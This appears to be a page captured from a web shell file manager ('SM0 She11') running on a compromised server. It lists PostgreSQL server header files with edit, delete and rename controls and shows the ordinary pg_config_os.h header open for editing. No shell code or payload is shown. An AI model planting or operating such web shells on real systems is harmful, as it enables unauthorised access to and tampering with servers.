SM0 She11
Path:
/
/
usr
/
include
/
pgsql
/
server
Full Path (server): /usr/include/pgsql/server
Create Fil3
Upl04d Fil3
📁 access
Open
[D]
[R]
📁 bootstrap
Open
[D]
[R]
📄 c.h
[E]
[D]
[R]
📁 catalog
Open
[D]
[R]
📁 commands
Open
[D]
[R]
📁 datatype
Open
[D]
[R]
📄 dynloader.h
[E]
[D]
[R]
📁 executor
Open
[D]
[R]
📄 fmgr.h
[E]
[D]
[R]
📁 foreign
Open
[D]
[R]
📄 funcapi.h
[E]
[D]
[R]
📄 getaddrinfo.h
[E]
[D]
[R]
📄 getopt_long.h
[E]
[D]
[R]
📁 lib
Open
[D]
[R]
📁 libpq
Open
[D]
[R]
📁 mb
Open
[D]
[R]
📄 miscadmin.h
[E]
[D]
[R]
📁 nodes
Open
[D]
[R]
📁 optimizer
Open
[D]
[R]
📁 parser
Open
[D]
[R]
📄 pg_config.h
[E]
[D]
[R]
📄 pg_config_manual.h
[E]
[D]
[R]
📄 pg_config_os.h
[E]
[D]
[R]
📄 pg_config_x86_64.h
[E]
[D]
[R]
📄 pg_trace.h
[E]
[D]
[R]
📄 pgstat.h
[E]
[D]
[R]
📄 pgtar.h
[E]
[D]
[R]
📄 pgtime.h
[E]
[D]
[R]
📄 plpgsql.h
[E]
[D]
[R]
📁 port
Open
[D]
[R]
📄 port.h
[E]
[D]
[R]
📁 portability
Open
[D]
[R]
📄 postgres.h
[E]
[D]
[R]
📄 postgres_ext.h
[E]
[D]
[R]
📄 postgres_fe.h
[E]
[D]
[R]
📁 postmaster
Open
[D]
[R]
📁 regex
Open
[D]
[R]
📁 replication
Open
[D]
[R]
📁 rewrite
Open
[D]
[R]
📄 rusagestub.h
[E]
[D]
[R]
📁 snowball
Open
[D]
[R]
📁 storage
Open
[D]
[R]
📁 tcop
Open
[D]
[R]
📁 tsearch
Open
[D]
[R]
📁 utils
Open
[D]
[R]
📄 windowapi.h
[E]
[D]
[R]
Editing: pg_config_os.h
/* src/include/port/linux.h */ /* * As of July 2007, all known versions of the Linux kernel will sometimes * return EIDRM for a shmctl() operation when EINVAL is correct (it happens * when the low-order 15 bits of the supplied shm ID match the slot number * assigned to a newer shmem segment). We deal with this by assuming that * EIDRM means EINVAL in PGSharedMemoryIsInUse(). This is reasonably safe * since in fact Linux has no excuse for ever returning EIDRM; it doesn't * track removed segments in a way that would allow distinguishing them from * private ones. But someday that code might get upgraded, and we'd have * to have a kernel version test here. */ #define HAVE_LINUX_EIDRM_BUG /* * Set the default wal_sync_method to fdatasync. With recent Linux versions, * xlogdefs.h's normal rules will prefer open_datasync, which (a) doesn't * perform better and (b) causes outright failures on ext4 data=journal * filesystems, because those don't support O_DIRECT. */ #define PLATFORM_DEFAULT_SYNC_METHOD SYNC_METHOD_FDATASYNC
Save